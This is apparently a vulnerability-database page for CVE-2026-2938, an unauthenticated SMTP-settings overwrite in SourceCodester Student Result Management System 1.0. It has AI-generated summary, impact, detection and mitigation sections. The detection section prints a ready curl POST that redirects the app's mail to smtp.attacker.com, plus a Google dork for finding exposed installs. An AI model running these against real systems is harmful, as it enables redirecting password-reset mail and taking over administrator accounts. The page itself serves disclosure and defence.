CVE-2026-2938
Received Received - Intake
Improper Access Control in SourceCodester SRMS Allows Remote Exploit

Publication date: 2026-02-22

Last updated on: 2026-04-29

Assigner: VulDB

Description
A vulnerability has been found in SourceCodester Student Result Management System 1.0. The affected element is an unknown function of the file /srms/script/admin/core/update_smtp.php. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-02-22
Last Modified
2026-04-29
Generated
2026-06-16
AI Q&A
2026-02-22
EPSS Evaluated
2026-06-15
NVD
CVE-2026-2938
EUVD
EUVD-2026-7691
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
munyweki student_result_management_system 1.0
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-266 A product incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor.
CWE-284 The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
Attack-Flow Graph
AI Quick Actions
Instant insights powered by AI
Compliance Impact

I don't know

Executive Summary

CVE-2026-2938 is a critical improper access control vulnerability in SourceCodester Student Result Management System 1.0, specifically in the administrative core script update_smtp.php. The vulnerability arises because the script does not perform any authentication or authorization checks before processing POST requests that update SMTP mail server settings.

This lack of access control allows unauthenticated remote attackers to send crafted requests to overwrite SMTP configuration parameters such as mail server, username, password, port, and security settings.

As a result, attackers can hijack the SMTP settings to redirect system emails, including password reset tokens, to a malicious server they control. This enables them to perform a full account takeover of the Super Administrator account.

Additionally, related vulnerabilities in the system allow unauthenticated attackers to inject bulk accounts and delete existing accounts, further compromising system integrity.

Impact Analysis

This vulnerability can have severe impacts including unauthorized full account takeover of the Super Administrator account by hijacking SMTP settings.

  • Attackers can redirect password reset emails and other sensitive communications to their own servers.
  • They can create arbitrary privileged accounts via unauthenticated bulk account injection.
  • Attackers can delete critical user accounts, including administrators, causing denial of service.

Overall, the vulnerability allows remote unauthenticated attackers to fully compromise the confidentiality, integrity, and availability of the affected system.

Detection Guidance

[{'type': 'paragraph', 'content': 'This vulnerability can be detected by checking if the administrative scripts, especially `/srms/script/admin/core/update_smtp.php`, accept unauthenticated POST requests that modify SMTP settings without proper session or privilege validation.'}, {'type': 'paragraph', 'content': 'One detection method is to attempt sending a crafted POST request to the vulnerable endpoint to see if SMTP settings can be changed without authentication.'}, {'type': 'paragraph', 'content': 'Additionally, network detection can involve searching for HTTP requests targeting the vulnerable script, for example by monitoring logs or using tools to detect POST requests to `/srms/script/admin/core/update_smtp.php` from unauthorized sources.'}, {'type': 'list_item', 'content': 'Use curl to test unauthorized POST request to update SMTP settings: curl -X POST -d "mail_server=smtp.attacker.com&mail_username=attacker&mail_password=pass&mail_port=25&mail_security=none" http://target/srms/script/admin/core/update_smtp.php'}, {'type': 'list_item', 'content': 'Search web server logs for POST requests to `/srms/script/admin/core/update_smtp.php` without valid session cookies.'}, {'type': 'list_item', 'content': 'Use Google dorking to identify exposed vulnerable endpoints: inurl:srms/script/admin/core/update_smtp.php'}] [1, 2, 3]

Mitigation Strategies

[{'type': 'paragraph', 'content': 'Immediate mitigation requires implementing strict session-based access control checks in all affected scripts, especially in `/srms/script/admin/core/update_smtp.php`, `/srms/script/admin/core/import_users.php`, and `/srms/script/admin/core/drop_user.php`.'}, {'type': 'paragraph', 'content': 'Specifically, the scripts should verify that a session exists and that the user has administrator privileges (level 0) before processing any requests.'}, {'type': 'paragraph', 'content': 'If the checks fail, the script should log the unauthorized access attempt and redirect the user to the login page to prevent unauthorized actions.'}, {'type': 'list_item', 'content': 'Add at the start of each vulnerable script: \n```php\nsession_start();\nif (!isset($_SESSION[\'level\']) || $_SESSION[\'level\'] != \'0\') {\n error_log("Unauthorized access attempt from " . $_SERVER[\'REMOTE_ADDR\']);\n header("location: ../../");\n exit();\n}\n```'}, {'type': 'paragraph', 'content': 'Additionally, review and patch all administrative scripts to ensure proper authentication and authorization checks are in place before processing sensitive operations.'}, {'type': 'paragraph', 'content': 'If possible, restrict access to these administrative endpoints via network controls or firewall rules until patches are applied.'}] [1]

Chat Assistant
Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-2938. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70
EPSS Chart